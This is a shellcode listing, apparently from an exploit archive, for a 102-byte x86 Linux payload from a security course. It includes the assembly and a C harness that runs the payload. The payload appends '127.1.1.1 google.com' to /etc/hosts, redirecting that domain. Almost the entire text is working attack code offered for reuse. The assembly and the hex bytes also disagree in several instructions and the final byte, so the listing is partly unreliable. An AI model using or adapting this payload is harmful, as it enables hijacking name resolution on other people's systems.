Linux/x86 /etc/hosts Mapping Add Polymorphic Shellcode

102 bytes small Linux/x86 add map in /etc/hosts file polymorphic shellcode.


MD5 | 979a6e0e42c8f46c1647b1c2de0c533a

# Title: Linux/x86 - Add map in /etc/hosts file polymorphic shellcode ( 102 bytes )
# Author: Xenofon Vassilakopoulos
# Date: 2020-06-15
# Tested on: Linux kali 5.3.0-kali2-686-pae #1 SMP Debian 5.3.9-3kali1 (2019-11-20) i686 GNU/Linux
# Architecture: i686 GNU/Linux
# Shellcode Length: 102 bytes
# Original shellcode: http://shell-storm.org/shellcode/files/shellcode-893.php
# SLAE-ID: SLAE - 1314
# Description: Adding a network map in /etc/hosts file

------------------ ASM ------------------

global _start

section .text

_start:
xor ecx, ecx
xor edx, edx
xor eax, eax
mov DWORD [esp-0x4],ecx
mov DWORD [esp-0x8],0x7374736f
mov DWORD [esp-0xc],0x682f2f2f
mov DWORD [esp-0x10],0x6374652f
sub esp,0x10
mov ebx,esp
mov cx, 0x3b1 ;permmisions
add cx, 0x50
mov al, 0x5
int 0x80 ;syscall to open file
mov ebx, eax
xor eax, eax
jmp short _ldata ;jmp-call-pop technique to load the map

write_data:
pop ecx
mov dl,0x12
add dl,0x3
mov al,0x4
int 0x80

add al,0x2
int 0x80

xor eax,eax
mov al,0x1
int 0x80

_ldata:
call write_data
message db "127.1.1.1 google.com",0x0A

------------------ Shellcode ------------------


#include <stdio.h>
#include <string.h>

unsigned char code[] = \
"\x31\xc9\x31\xc0\x89\x4c\x24\xfc\xc7\x44\x24\xf8\x6f\x73\x74\x73\xc7\x44\x24"
"\xf4\x2f\x2f\x2f\x68\xc7\x44\x24\xf0\x2f\x65\x74\x63\x83\xec\x10\x89\xe3\x66"
"\xb9\xb1\x03\x66\x83\xc1\x50\xb0\x05\xcd\x80\x89\xc3\x31\xc0\xeb\x14\x59\xb2"
"\x12\x80\xc2\x02\xb0\x04\xcd\x80\x04\x02\xcd\x80\x31\xc0\xb0\x01\xcd\x80\xe8"
"\xe7\xff\xff\xff\x31\x32\x37\x2e\x31\x2e\x31\x2e\x31\x20\x67\x6f\x6f\x67\x6c"
"\x65\x2e\x63\x6f\x6d\x0a\x0d";

int main()
{
printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();
}

Related Posts